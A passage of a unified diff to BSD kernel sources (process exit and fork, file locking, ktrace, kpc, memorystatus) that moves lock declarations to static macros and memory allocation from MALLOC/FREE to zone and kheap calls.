1) { + /* + * First check at the page containing the current PC. + * This passes if the page code signs -or- if we can't figure out + * what is at that address. The latter action is so we continue checking + * previous pages which may be corrupt and caused a wild branch. + */ + kr = revalidate_text_page(task, bt[0]); + + /* No corruption found, check the previous sequential page */ + if (kr == KERN_SUCCESS) { + kr = revalidate_text_page(task, bt[0] - get_task_page_size(task)); + } + + /* Still no corruption found, check the current function's caller */ + if (kr == KERN_SUCCESS) { + if (frame_count > 1 && + atop(bt[0]) != atop(bt[1]) && /* don't recheck PC page */ + atop(bt[0]) - 1 != atop(bt[1])) { /* don't recheck page before */ + kr = revalidate_text_page(task, (vm_map_offset_t)bt[1]); + } + } + + /* + * Log that we found a corruption. + * TBD..figure out how to bubble this up to crash reporter too, + * instead of just the log message. + */ + if (kr != KERN_SUCCESS) { + os_log(OS_LOG_DEFAULT, + "Text page corruption detected in dying process %d\n", p->p_pid); + } + } } skipcheck: @@ -1389,7 +1441,7 @@ proc_exit(proc_t p) } /* check for sysctl zomb lookup */ while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } q->p_listflag |= P_LIST_WAITING; /* @@ -1630,7 +1682,7 @@ proc_exit(proc_t p) pid, exitval, 0, 0, 0); /* check for sysctl zomb lookup */ while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } /* safe to use p as this is a system reap */ p->p_stat = SZOMB; @@ -1843,13 +1895,14 @@ reap_child_locked(proc_t parent, proc_t child, int deadparent, int reparentedtoi child->p_ucred = NOCRED; } - lck_mtx_destroy(&child->p_mlock, proc_mlock_grp); - lck_mtx_destroy(&child->p_ucred_mlock, proc_ucred_mlock_grp); - lck_mtx_destroy(&child->p_fdmlock, proc_fdmlock_grp); + lck_mtx_destroy(&child->p_mlock, &proc_mlock_grp); + lck_mtx_destroy(&child->p_ucred_mlock, &proc_ucred_mlock_grp); + lck_mtx_destroy(&child->p_fdmlock, &proc_fdmlock_grp); #if CONFIG_DTRACE - lck_mtx_destroy(&child->p_dtrace_sprlock, proc_lck_grp); + lck_mtx_destroy(&child->p_dtrace_sprlock, &proc_lck_grp); #endif - lck_spin_destroy(&child->p_slock, proc_slock_grp); + lck_spin_destroy(&child->p_slock, &proc_slock_grp); + lck_rw_destroy(&child->p_dirs_lock, &proc_dirslock_grp); zfree(proc_zone, child); if ((locked == 1) && (droplock == 0)) { @@ -1935,7 +1988,7 @@ loop1: wait4_data->args = uap; thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess); - (void)msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + (void)msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); goto loop1; } p->p_listflag |= P_LIST_WAITING; /* only allow single thread to wait() */ @@ -2080,7 +2133,7 @@ loop1: wait4_data->retval = retval; thread_set_pending_block_hint(current_thread(), kThreadWaitOnProcess); - if ((error = msleep0((caddr_t)q, proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) { + if ((error = msleep0((caddr_t)q, &proc_list_mlock, PWAIT | PCATCH | PDROP, "wait", 0, wait1continue))) { return error; } @@ -2199,7 +2252,7 @@ loop1: * the single return for waited process guarantee. */ if (p->p_listflag & P_LIST_WAITING) { - (void) msleep(&p->p_stat, proc_list_mlock, + (void) msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitidcoll", 0); goto loop1; } @@ -2327,14 +2380,14 @@ loop1: } goto out; } - ASSERT_LCK_MTX_OWNED(proc_list_mlock); + ASSERT_LCK_MTX_OWNED(&proc_list_mlock); /* Not a process we are interested in; go on to next child */ p->p_listflag &= ~P_LIST_WAITING; wakeup(&p->p_stat); } - ASSERT_LCK_MTX_OWNED(proc_list_mlock); + ASSERT_LCK_MTX_OWNED(&proc_list_mlock); /* No child processes that could possibly satisfy the request? */ @@ -2368,7 +2421,7 @@ loop1: waitid_data->args = uap; waitid_data->retval = retval; - if ((error = msleep0(q, proc_list_mlock, + if ((error = msleep0(q, &proc_list_mlock, PWAIT | PCATCH | PDROP, "waitid", 0, waitidcontinue)) != 0) { return error; } @@ -2562,7 +2615,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit) } /* check for lookups by zomb sysctl */ while ((q->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&q->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&q->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } q->p_listflag |= P_LIST_WAITING; /* @@ -2725,8 +2778,9 @@ vfork_exit_internal(proc_t p, int rv, int forceexit) zfree(proc_sigacts_zone, p->p_sigacts); p->p_sigacts = NULL; - FREE(p->p_subsystem_root_path, M_SBUF); - p->p_subsystem_root_path = NULL; + if (p->p_subsystem_root_path) { + zfree(ZV_NAMEI, p->p_subsystem_root_path); + } proc_limitdrop(p); @@ -2775,7 +2829,7 @@ vfork_exit_internal(proc_t p, int rv, int forceexit) proc_list_lock(); /* check for lookups by zomb sysctl */ while ((p->p_listflag & P_LIST_WAITING) == P_LIST_WAITING) { - msleep(&p->p_stat, proc_list_mlock, PWAIT, "waitcoll", 0); + msleep(&p->p_stat, &proc_list_mlock, PWAIT, "waitcoll", 0); } p->p_stat = SZOMB; p->p_listflag |= P_LIST_WAITING; diff --git a/bsd/kern/kern_fork.c b/bsd/kern/kern_fork.c index b9475aed1..e48cffe6d 100644 --- a/bsd/kern/kern_fork.c +++ b/bsd/kern/kern_fork.c @@ -841,12 +841,13 @@ fork_create_child(task_t parent_task, } /* - * Create a new thread for the child process + * Create a new thread for the child process. Pin it and make it immovable. * The new thread is waiting on the event triggered by 'task_clear_return_wait' */ result = thread_create_waiting(child_task, (thread_continue_t)task_wait_to_return, task_get_return_wait_event(child_task), + TH_CREATE_WAITING_OPTION_PINNED | TH_CREATE_WAITING_OPTION_IMMOVABLE, &child_thread); if (result != KERN_SUCCESS) { @@ -1124,13 +1125,14 @@ forkproc_free(proc_t p) /* Update the audit session proc count */ AUDIT_SESSION_PROCEXIT(p); - lck_mtx_destroy(&p->p_mlock, proc_mlock_grp); - lck_mtx_destroy(&p->p_fdmlock, proc_fdmlock_grp); - lck_mtx_destroy(&p->p_ucred_mlock, proc_ucred_mlock_grp); + lck_mtx_destroy(&p->p_mlock, &proc_mlock_grp); + lck_mtx_destroy(&p->p_fdmlock, &proc_fdmlock_grp); + lck_mtx_destroy(&p->p_ucred_mlock, &proc_ucred_mlock_grp); #if CONFIG_DTRACE - lck_mtx_destroy(&p->p_dtrace_sprlock, proc_lck_grp); + lck_mtx_destroy(&p->p_dtrace_sprlock, &proc_lck_grp); #endif - lck_spin_destroy(&p->p_slock, proc_slock_grp); + lck_spin_destroy(&p->p_slock, &proc_slock_grp); + lck_rw_destroy(&p->p_dirs_lock, &proc_dirslock_grp); /* Release the credential reference */ kauth_cred_t tmp_ucred = p->p_ucred; @@ -1153,8 +1155,9 @@ forkproc_free(proc_t p) p->p_sigacts = NULL; zfree(proc_stats_zone, p->p_stats); p->p_stats = NULL; - FREE(p->p_subsystem_root_path, M_SBUF); - p->p_subsystem_root_path = NULL; + if (p->p_subsystem_root_path) { + zfree(ZV_NAMEI, p->p_subsystem_root_path); + } proc_checkdeadrefs(p); zfree(proc_zone, p); @@ -1317,13 +1320,14 @@ retry: /* update audit session proc count */ AUDIT_SESSION_PROCNEW(child_proc); - lck_mtx_init(&child_proc->p_mlock, proc_mlock_grp, proc_lck_attr); - lck_mtx_init(&child_proc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr); - lck_mtx_init(&child_proc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr); + lck_mtx_init(&child_proc->p_mlock, &proc_mlock_grp, &proc_lck_attr); + lck_mtx_init(&child_proc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr); + lck_mtx_init(&child_proc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr); #if CONFIG_DTRACE - lck_mtx_init(&child_proc->p_dtrace_sprlock, proc_lck_grp, proc_lck_attr); + lck_mtx_init(&child_proc->p_dtrace_sprlock, &proc_lck_grp, &proc_lck_attr); #endif - lck_spin_init(&child_proc->p_slock, proc_slock_grp, proc_lck_attr); + lck_spin_init(&child_proc->p_slock, &proc_slock_grp, &proc_lck_attr); + lck_rw_init(&child_proc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr); klist_init(&child_proc->p_klist); @@ -1348,7 +1352,6 @@ retry: * * XXX may fail to copy descriptors to child */ - lck_rw_init(&child_proc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr); child_proc->p_fd = fdcopy(parent_proc, parent_uthread->uu_cdir); #if SYSV_SHM @@ -1462,7 +1465,9 @@ retry: if (parent_proc->p_subsystem_root_path) { size_t parent_length = strlen(parent_proc->p_subsystem_root_path) + 1; - MALLOC(child_proc->p_subsystem_root_path, char *, parent_length, M_SBUF, M_WAITOK | M_ZERO); + assert(parent_length <= MAXPATHLEN); + child_proc->p_subsystem_root_path = zalloc_flags(ZV_NAMEI, + Z_WAITOK | Z_ZERO); memcpy(child_proc->p_subsystem_root_path, parent_proc->p_subsystem_root_path, parent_length); } @@ -1473,7 +1478,7 @@ bad: void proc_lock(proc_t p) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); lck_mtx_lock(&p->p_mlock); } @@ -1486,7 +1491,7 @@ proc_unlock(proc_t p) void proc_spinlock(proc_t p) { - lck_spin_lock_grp(&p->p_slock, proc_slock_grp); + lck_spin_lock_grp(&p->p_slock, &proc_slock_grp); } void @@ -1498,13 +1503,13 @@ proc_spinunlock(proc_t p) void proc_list_lock(void) { - lck_mtx_lock(proc_list_mlock); + lck_mtx_lock(&proc_list_mlock); } void proc_list_unlock(void) { - lck_mtx_unlock(proc_list_mlock); + lck_mtx_unlock(&proc_list_mlock); } void @@ -1634,7 +1639,6 @@ uthread_cleanup_name(void *uthread) void uthread_cleanup(task_t task, void *uthread, void * bsd_info) { - struct _select *sel; uthread_t uth = (uthread_t)uthread; proc_t p = (proc_t)bsd_info; @@ -1669,12 +1673,8 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info) kqueue_threadreq_unbind(p, uth->uu_kqr_bound); } - sel = &uth->uu_select; - /* cleanup the select bit space */ - if (sel->nbytes) { - FREE(sel->ibits, M_TEMP); - FREE(sel->obits, M_TEMP); - sel->nbytes = 0; + if (uth->uu_select.nbytes) { + select_cleanup_uthread(&uth->uu_select); } if (uth->uu_cdir) { @@ -1686,7 +1686,7 @@ uthread_cleanup(task_t task, void *uthread, void * bsd_info) if (waitq_set_is_valid(uth->uu_wqset)) { waitq_set_deinit(uth->uu_wqset); } - FREE(uth->uu_wqset, M_SELECT); + kheap_free(KHEAP_DEFAULT, uth->uu_wqset, uth->uu_wqstate_sz); uth->uu_wqset = NULL; uth->uu_wqstate_sz = 0; } diff --git a/bsd/kern/kern_guarded.c b/bsd/kern/kern_guarded.c index 6827a927f..8fc2889fd 100644 --- a/bsd/kern/kern_guarded.c +++ b/bsd/kern/kern_guarded.c @@ -1006,8 +1006,8 @@ free_vgo(struct vng_owner *vgo) } static int label_slot; -static lck_rw_t llock; -static lck_grp_t *llock_grp; +static LCK_GRP_DECLARE(llock_grp, VNG_POLICY_NAME); +static LCK_RW_DECLARE(llock, &llock_grp); static __inline void * vng_lbl_get(struct label *label) @@ -1413,7 +1413,9 @@ vng_guard_violation(const struct vng_info *vgi, if (vng_policy_flags & kVNG_POLICY_EXC_CORPSE) { char *path; int len = MAXPATHLEN; - MALLOC(path, char *, len, M_TEMP, M_WAITOK); + + path = zalloc(ZV_NAMEI); + os_reason_t r = NULL; if (NULL != path) { vn_getpath(vp, path, &len); @@ -1425,9 +1427,8 @@ vng_guard_violation(const struct vng_info *vgi, if (NULL != r) { os_reason_free(r); } - if (NULL != path) { - FREE(path, M_TEMP); - } + + zfree(ZV_NAMEI, path); } else { thread_t t = current_thread(); thread_guard_violation(t, code, subcode, TRUE); @@ -1623,13 +1624,6 @@ vng_vnode_check_open(kauth_cred_t cred, * Configuration gorp */ -static void -vng_init(struct mac_policy_conf *mpc) -{ - llock_grp = lck_grp_alloc_init(mpc->mpc_name, LCK_GRP_ATTR_NULL); - lck_rw_init(&llock, llock_grp, LCK_ATTR_NULL); -} - SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = { .mpo_file_label_destroy = vng_file_label_destroy, @@ -1642,7 +1636,6 @@ SECURITY_READ_ONLY_EARLY(static struct mac_policy_ops) vng_policy_ops = { .mpo_vnode_check_open = vng_vnode_check_open, .mpo_policy_syscall = vng_policy_syscall, - .mpo_policy_init = vng_init, }; static const char *vng_labelnames[] = { diff --git a/bsd/kern/kern_kpc.c b/bsd/kern/kern_kpc.c index e60018e65..55dc92a99 100644 --- a/bsd/kern/kern_kpc.c +++ b/bsd/kern/kern_kpc.c @@ -62,9 +62,8 @@ typedef int (*setint_t)(int); static int kpc_initted = 0; -static lck_grp_attr_t *sysctl_lckgrp_attr = NULL; -static lck_grp_t *sysctl_lckgrp = NULL; -static lck_mtx_t sysctl_lock; +static LCK_GRP_DECLARE(sysctl_lckgrp, "kpc"); +static LCK_MTX_DECLARE(sysctl_lock, &sysctl_lckgrp); /* * Another element is needed to hold the CPU number when getting counter values. @@ -76,10 +75,6 @@ typedef int (*setget_func_t)(int); void kpc_init(void) { - sysctl_lckgrp_attr = lck_grp_attr_alloc_init(); - sysctl_lckgrp = lck_grp_alloc_init("kpc", sysctl_lckgrp_attr); - lck_mtx_init(&sysctl_lock, sysctl_lckgrp, LCK_ATTR_NULL); - kpc_arch_init(); kpc_initted = 1; diff --git a/bsd/kern/kern_ktrace.c b/bsd/kern/kern_ktrace.c index c36219ae7..3f2a7ef0f 100644 --- a/bsd/kern/kern_ktrace.c +++ b/bsd/kern/kern_ktrace.c @@ -70,7 +70,8 @@ char *proc_name_address(void *p); kern_return_t ktrace_background_available_notify_user(void); -static lck_mtx_t *ktrace_mtx; +static LCK_GRP_DECLARE(ktrace_grp, "ktrace"); +static LCK_MTX_DECLARE(ktrace_mtx, &ktrace_grp); /* * The overall state of ktrace, whether it is unconfigured, in foreground mode, @@ -148,7 +149,7 @@ void ktrace_lock(void) { if (!ktrace_single_threaded) { - lck_mtx_lock(ktrace_mtx); + lck_mtx_lock(&ktrace_mtx); } } @@ -156,7 +157,7 @@ void ktrace_unlock(void) { if (!ktrace_single_threaded) { - lck_mtx_unlock(ktrace_mtx); + lck_mtx_unlock(&ktrace_mtx); } } @@ -164,7 +165,7 @@ void ktrace_assert_lock_held(void) { if (!ktrace_single_threaded) { - lck_mtx_assert(ktrace_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ktrace_mtx, LCK_MTX_ASSERT_OWNED); } } @@ -548,24 +549,3 @@ out: ktrace_unlock(); return ret; } - -/* This should only be called from the bootstrap thread. */ -void -ktrace_init(void) -{ - static lck_grp_attr_t *lock_grp_attr = NULL; - static lck_grp_t *lock_grp = NULL; - static bool initialized = false; - - if (initialized) { - return; - } - - lock_grp_attr = lck_grp_attr_alloc_init(); - lock_grp = lck_grp_alloc_init("ktrace", lock_grp_attr); - lck_grp_attr_free(lock_grp_attr); - - ktrace_mtx = lck_mtx_alloc_init(lock_grp, LCK_ATTR_NULL); - assert(ktrace_mtx != NULL);; - initialized = true; -} diff --git a/bsd/kern/kern_lockf.c b/bsd/kern/kern_lockf.c index 03f86bef2..18e372d11 100644 --- a/bsd/kern/kern_lockf.c +++ b/bsd/kern/kern_lockf.c @@ -117,7 +117,11 @@ SYSCTL_INT(_debug, OID_AUTO, lockf_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &lockf_de #define LOCKF_DEBUG(mask, ...) /* mask */ #endif /* !LOCKF_DEBUGGING */ -MALLOC_DEFINE(M_LOCKF, "lockf", "Byte-range locking structures"); +/* + * If you need accounting for KM_LOCKF consider using + * ZONE_VIEW_DEFINE to define a view. + */ +#define KM_LOCKF KHEAP_DEFAULT #define NOLOCKF (struct lockf *)0 #define SELF 0x1 @@ -152,15 +156,8 @@ static void lf_boost_blocking_proc(struct lockf *, struct lockf *); static void lf_adjust_assertion(struct lockf *block); #endif /* IMPORTANCE_INHERITANCE */ -static lck_mtx_t lf_dead_lock; -static lck_grp_t *lf_dead_lock_grp; - -void -lf_init(void) -{ - lf_dead_lock_grp = lck_grp_alloc_init("lf_dead_lock", LCK_GRP_ATTR_NULL); - lck_mtx_init(&lf_dead_lock, lf_dead_lock_grp, LCK_ATTR_NULL); -} +static LCK_GRP_DECLARE(lf_dead_lock_grp, "lf_dead_lock"); +static LCK_MTX_DECLARE(lf_dead_lock, &lf_dead_lock_grp); /* * lf_advlock @@ -285,7 +282,7 @@ lf_advlock(struct vnop_advlock_args *ap) /* * Create the lockf structure */ - MALLOC(lock, struct lockf *, sizeof *lock, M_LOCKF, M_WAITOK); + lock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK); if (lock == NULL) { return ENOLCK; } @@ -336,21 +333,21 @@ lf_advlock(struct vnop_advlock_args *ap) case F_UNLCK: error = lf_clearlock(lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); break; case F_GETLK: error = lf_getlock(lock, fl, -1); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); break; case F_GETLKPID: error = lf_getlock(lock, fl, fl->l_pid); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); break; default: - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); error = EINVAL; break; } @@ -451,7 +448,7 @@ lf_coalesce_adjacent(struct lockf *lock) lf_move_blocked(lock, adjacent); - FREE(adjacent, M_LOCKF); + kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf)); continue; } /* If the lock starts adjacent to us, we can coalesce it */ @@ -466,7 +463,7 @@ lf_coalesce_adjacent(struct lockf *lock) lf_move_blocked(lock, adjacent); - FREE(adjacent, M_LOCKF); + kheap_free(KM_LOCKF, adjacent, sizeof(struct lockf)); continue; } @@ -538,7 +535,7 @@ scan: */ if ((lock->lf_flags & F_WAIT) == 0) { DTRACE_FSINFO(advlock__nowait, vnode_t, vp); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return EAGAIN; } @@ -676,7 +673,7 @@ scan: LOCKF_DEBUG(LF_DBG_DEADLOCK, "lock %p which is me, so EDEADLK\n", lock); proc_unlock(wproc); lck_mtx_unlock(&lf_dead_lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return EDEADLK; } } @@ -695,7 +692,7 @@ scan: lock->lf_type == F_WRLCK) { lock->lf_type = F_UNLCK; if ((error = lf_clearlock(lock)) != 0) { - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return error; } lock->lf_type = F_WRLCK; @@ -799,7 +796,7 @@ scan: if (!TAILQ_EMPTY(&lock->lf_blkhd)) { lf_wakelock(lock, TRUE); } - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); /* Return ETIMEDOUT if timeout occoured. */ if (error == EWOULDBLOCK) { error = ETIMEDOUT; @@ -852,7 +849,7 @@ scan: } overlap->lf_type = lock->lf_type; lf_move_blocked(overlap, lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); lock = overlap; /* for lf_coalesce_adjacent() */ break; @@ -862,7 +859,7 @@ scan: */ if (overlap->lf_type == lock->lf_type) { lf_move_blocked(overlap, lock); - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); lock = overlap; /* for lf_coalesce_adjacent() */ break; } @@ -877,7 +874,7 @@ scan: * resource shortage. */ if (lf_split(overlap, lock)) { - FREE(lock, M_LOCKF); + kheap_free(KM_LOCKF, lock, sizeof(struct lockf)); return ENOLCK; } } @@ -906,7 +903,7 @@ scan: } else { *prev = overlap->lf_next; } - FREE(overlap, M_LOCKF); + kheap_free(KM_LOCKF, overlap, sizeof(struct lockf)); continue; case OVERLAP_STARTS_BEFORE_LOCK: @@ -1000,7 +997,7 @@ lf_clearlock(struct lockf *unlock) case OVERLAP_EQUALS_LOCK: *prev = overlap->lf_next; - FREE(overlap, M_LOCKF); + kheap_free(KM_LOCKF, overlap, sizeof(struct lockf)); break; case OVERLAP_CONTAINS_LOCK: /* split it */ @@ -1021,7 +1018,7 @@ lf_clearlock(struct lockf *unlock) case OVERLAP_CONTAINED_BY_LOCK: *prev = overlap->lf_next; lf = overlap->lf_next; - FREE(overlap, M_LOCKF); + kheap_free(KM_LOCKF, overlap, sizeof(struct lockf)); continue; case OVERLAP_STARTS_BEFORE_LOCK: @@ -1346,7 +1343,7 @@ lf_split(struct lockf *lock1, struct lockf *lock2) * Make a new lock consisting of the last part of * the encompassing lock */ - MALLOC(splitlock, struct lockf *, sizeof *splitlock, M_LOCKF, M_WAITOK); + splitlock = kheap_alloc(KM_LOCKF, sizeof(struct lockf), Z_WAITOK); if (splitlock == NULL) { return ENOLCK; } @@ -1465,13 +1462,13 @@ lf_print(const char *tag, struct lockf *lock) lock->lf_type == F_RDLCK ? "shared" : lock->lf_type == F_WRLCK ? "exclusive" : lock->lf_type == F_UNLCK ? "unlock" : "unknown", - (intmax_t)lock->lf_start, (intmax_t)lock->lf_end); + (uint64_t)lock->lf_start, (uint64_t)lock->lf_end); } else { printf(" %s, start 0x%016llx, end 0x%016llx", lock->lf_type == F_RDLCK ? "shared" : lock->lf_type == F_WRLCK ? "exclusive" : lock->lf_type == F_UNLCK ? "unlock" : "unknown", - (intmax_t)lock->lf_start, (intmax_t)lock->lf_end); + (uint64_t)lock->lf_start, (uint64_t)lock->lf_end); } if (!TAILQ_EMPTY(&lock->lf_blkhd)) { printf(" block %p\n", (void *)TAILQ_FIRST(&lock->lf_blkhd)); @@ -1519,7 +1516,7 @@ lf_printlist(const char *tag, struct lockf *lock) lf->lf_type == F_RDLCK ? "shared" : lf->lf_type == F_WRLCK ? "exclusive" : lf->lf_type == F_UNLCK ? "unlock" : - "unknown", (intmax_t)lf->lf_start, (intmax_t)lf->lf_end); + "unknown", (uint64_t)lf->lf_start, (uint64_t)lf->lf_end); TAILQ_FOREACH(blk, &lf->lf_blkhd, lf_block) { printf("\n\t\tlock request %p for ", (void *)blk); if (blk->lf_flags & F_POSIX) { @@ -1535,8 +1532,8 @@ lf_printlist(const char *tag, struct lockf *lock) blk->lf_type == F_RDLCK ? "shared" : blk->lf_type == F_WRLCK ? "exclusive" : blk->lf_type == F_UNLCK ? "unlock" : - "unknown", (intmax_t)blk->lf_start, - (intmax_t)blk->lf_end); + "unknown", (uint64_t)blk->lf_start, + (uint64_t)blk->lf_end); if (!TAILQ_EMPTY(&blk->lf_blkhd)) { panic("lf_printlist: bad list"); } diff --git a/bsd/kern/kern_memorystatus.c b/bsd/kern/kern_memorystatus.c index 69e5f6d69..677c73b03 100644 --- a/bsd/kern/kern_memorystatus.c +++ b/bsd/kern/kern_memorystatus.c @@ -253,13 +253,13 @@ uint64_t memorystatus_jetsam_snapshot_timeout = 0; #if DEVELOPMENT || DEBUG /* * On development and debug kernels, we allow one pid to take ownership - * of the memorystatus snapshot (via memorystatus_control). - * If there's an owner, then only they may consume the snapshot. - * This is used when testing the snapshot interface to avoid racing with other - * processes on the system that consume snapshots. + * of some memorystatus data structures for testing purposes (via memorystatus_control). + * If there's an owner, then only they may consume the jetsam snapshot & set freezer probabilities. + * This is used when testing these interface to avoid racing with other + * processes on the system that typically use them (namely OSAnalytics & dasd). */ -static pid_t memorystatus_snapshot_owner = 0; -SYSCTL_INT(_kern, OID_AUTO, memorystatus_snapshot_owner, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_snapshot_owner, 0, ""); +static pid_t memorystatus_testing_pid = 0; +SYSCTL_INT(_kern, OID_AUTO, memorystatus_testing_pid, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_testing_pid, 0, ""); #endif /* DEVELOPMENT || DEBUG */ static void memorystatus_init_jetsam_snapshot_header(memorystatus_jetsam_snapshot_t *snapshot); @@ -276,9 +276,10 @@ SYSCTL_INT(_kern, OID_AUTO, entitled_max_task_pmem, CTLTYPE_INT | CTLFLAG_RW | C #endif /* DEVELOPMENT || DEBUG */ #endif /* __arm64__ */ -static lck_grp_attr_t *memorystatus_jetsam_fg_band_lock_grp_attr; -static lck_grp_t *memorystatus_jetsam_fg_band_lock_grp; -lck_mtx_t memorystatus_jetsam_fg_band_lock; +static LCK_GRP_DECLARE(memorystatus_jetsam_fg_band_lock_grp, + "memorystatus_jetsam_fg_band"); +LCK_MTX_DECLARE(memorystatus_jetsam_fg_band_lock, + &memorystatus_jetsam_fg_band_lock_grp); /* Idle guard handling */ @@ -598,7 +599,7 @@ memorystatus_raise_memlimit(proc_t p, int new_memlimit_active, int new_memlimit_ int memlimit_mb_active = 0, memlimit_mb_inactive = 0; boolean_t memlimit_active_is_fatal = FALSE, memlimit_inactive_is_fatal = FALSE, use_active_limit = FALSE; - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (p->p_memstat_memlimit_active > 0) { memlimit_mb_active = p->p_memstat_memlimit_active; @@ -918,9 +919,8 @@ int32_t max_kill_priority = JETSAM_PRIORITY_IDLE; #if DEVELOPMENT || DEBUG -lck_grp_attr_t *disconnect_page_mappings_lck_grp_attr; -lck_grp_t *disconnect_page_mappings_lck_grp; -static lck_mtx_t disconnect_page_mappings_mutex; +static LCK_GRP_DECLARE(disconnect_page_mappings_lck_grp, "disconnect_page_mappings"); +static LCK_MTX_DECLARE(disconnect_page_mappings_mutex, &disconnect_page_mappings_lck_grp); extern bool kill_on_no_paging_space; #endif /* DEVELOPMENT || DEBUG */ @@ -1174,7 +1174,7 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_disconnect_page_mappings, CTLTYPE_INT static void memorystatus_sort_bucket_locked(unsigned int bucket_index, int sort_order) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (memstat_bucket[bucket_index].count == 0) { return; } @@ -1406,21 +1406,11 @@ memorystatus_init(void) #endif #if DEVELOPMENT || DEBUG - disconnect_page_mappings_lck_grp_attr = lck_grp_attr_alloc_init(); - disconnect_page_mappings_lck_grp = lck_grp_alloc_init("disconnect_page_mappings", disconnect_page_mappings_lck_grp_attr); - - lck_mtx_init(&disconnect_page_mappings_mutex, disconnect_page_mappings_lck_grp, NULL); - if (kill_on_no_paging_space) { max_kill_priority = JETSAM_PRIORITY_MAX; } #endif - memorystatus_jetsam_fg_band_lock_grp_attr = lck_grp_attr_alloc_init(); - memorystatus_jetsam_fg_band_lock_grp = - lck_grp_alloc_init("memorystatus_jetsam_fg_band", memorystatus_jetsam_fg_band_lock_grp_attr); - lck_mtx_init(&memorystatus_jetsam_fg_band_lock, memorystatus_jetsam_fg_band_lock_grp, NULL); - /* Init buckets */ for (i = 0; i < MEMSTAT_BUCKET_COUNT; i++) { TAILQ_INIT(&memstat_bucket[i].list); @@ -1625,6 +1615,8 @@ memorystatus_init(void) /* Centralised for the purposes of allowing panic-on-jetsam */ extern void vm_run_compactor(void); +extern void +vm_wake_compactor_swapper(void); /* * The jetsam no frills kill call @@ -1694,7 +1686,17 @@ memorystatus_do_kill(proc_t p, uint32_t cause, os_reason_t jetsam_reason, uint64 KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_START, victim_pid, cause, vm_page_free_count, *footprint_of_killed_proc, 0); - vm_run_compactor(); + if (jetsam_reason->osr_code == JETSAM_REASON_VNODE) { + /* + * vnode jetsams are syncronous and not caused by memory pressure. + * Running the compactor on this thread adds significant latency to the filesystem operation + * that triggered this jetsam. + * Kick of compactor thread asyncronously instead. + */ + vm_wake_compactor_swapper(); + } else { + vm_run_compactor(); + } KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_MEMSTAT, BSD_MEMSTAT_COMPACTOR_RUN)) | DBG_FUNC_END, victim_pid, cause, vm_page_free_count, 0, 0); @@ -2713,8 +2715,8 @@ memorystatus_remove(proc_t p) #endif #if DEVELOPMENT || DEBUG - if (p->p_pid == memorystatus_snapshot_owner) { - memorystatus_snapshot_owner = 0; + if (p->p_pid == memorystatus_testing_pid) { + memorystatus_testing_pid = 0; } #endif /* DEVELOPMENT || DEBUG */ @@ -3434,6 +3436,10 @@ memorystatus_on_resume(proc_t p) p->p_memstat_state |= P_MEMSTAT_REFREEZE_ELIGIBLE; memorystatus_refreeze_eligible_count++; } + if (p->p_memstat_thaw_count == 0 || p->p_memstat_last_thaw_interval < memorystatus_freeze_current_interval) { + os_atomic_inc(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed); + } + p->p_memstat_last_thaw_interval = memorystatus_freeze_current_interval; p->p_memstat_thaw_count++; memorystatus_thaw_count++; @@ 